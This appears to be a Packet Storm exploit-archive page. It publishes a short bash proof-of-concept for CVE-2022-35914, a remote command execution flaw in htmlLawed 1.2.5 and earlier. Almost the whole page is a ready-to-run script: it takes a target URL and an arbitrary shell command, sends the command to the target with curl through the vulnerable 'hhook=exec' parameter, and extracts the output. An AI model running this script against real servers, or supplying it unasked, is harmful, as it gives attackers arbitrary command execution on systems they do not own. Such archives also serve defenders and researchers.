htmlLawed 1.2.5 Remote Command Execution ≈ Packet Storm

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

htmlLawed 1.2.5 Remote Command Execution[6]
Authored by d4t4s3c[7]

htmlLawed versions 1.2.5 and below proof of concept remote command execution exploit.

advisories | CVE-2022-35914[8]
SHA-256 | f7c13b91b7562803551ff2c81af4d91f8007cf734173bc191c1002abafa0fa8f

Change Mirror[12] Download[13]

        #!/bin/bash
# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution
# Date: 2024-05-02
# Exploit Author: Miguel Redondo (aka d4t4s3c)
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
# Software Link: https://github.com/kesar/HTMLawed
# Version: <= 1.2.5
# Tested on: Linux
# Category: Web Application
# CVE: CVE-2022-35914
while getopts ":u:c:" arg; do
case ${arg} in
u) url=${OPTARG}; let parameter_counter+=1 ;;
c) cmd=${OPTARG}; let parameter_counter+=1 ;;
esac
done
if [ -z "${url}" ] || [ -z "${cmd}" ]; then
echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"
echo -e "\n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>\n"
exit 1
else
echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"
echo -e "\n[+] Executing Command: ${cmd}\n"
cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\&nbsp; \[[0-9]+\] =\>' | sed -E 's/\&nbsp; \[[0-9]+\] =\> (.*)<br \/>/\1/')
echo -e "${cmd_output}\n"
exit 0
fi

Login[14] or Register[15] to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services[120]
Hosting By
Rokasec[121]
close
Image

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"